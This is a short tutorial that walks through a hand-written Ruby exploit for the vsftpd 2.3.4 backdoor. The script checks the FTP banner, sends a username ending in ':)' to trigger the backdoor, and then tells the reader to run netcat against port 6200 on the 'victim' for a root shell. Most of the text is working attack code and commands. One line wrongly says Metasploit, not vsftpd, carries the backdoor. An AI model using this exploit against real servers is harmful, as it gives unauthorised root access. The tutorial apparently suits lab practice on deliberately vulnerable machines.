Creating Exploit for Vsftpd 2.3.4

Exploiting VSFTPD Manually

Exploiting VSFTPD Manually

VSFTPD is a FTP server for linux, unix like operating system.

The 2.3.4 version of Metasploit contains a backdoor which when triggered gives a root shell.

The username when supplied with a ‘smiley :)’ triggers the backdoor and the shell access is given on port 6200. There’s already a metasploit exploit, but let’s try to do this manually.

For now we’ll make a ruby script to just login to the vulnerable FTP and then we’ll connect with netcat to obtain root shell.

I’ve commented lines to tell the functioning


#!/usr/bin/env ruby

require ‘socket’
#load the socket library
a=TCPSocket.open(ARGV[0],21)

#Open the socket to the IP supplied  as the arguement to the script.
if a.gets=~/vsFTPd 2.3.4/

#check the version of the FTP
p ‘Machine is Vulnerable Sending Exploit’
a.puts ‘USER evil:)’

#send the username as evil:) to trigger the backdoor
p a.gets
a.puts ‘PASS blah’

# Send the password
p ‘Exploit Execution Success!’
p ‘Connect on port TCP:6200 for root shell’
a.close
else
p ‘Not Vulnerable, Quitting!’
a.close
end


Here i saved the file as vsftpd.rb

Below is the screenshot of the code itself.

code

To run the code type in ruby vsftpd.rb

Once the code is executed, you just need to connect to the port 6200 of the victim machine to gain the Root Shell.

nc VictimIP 6200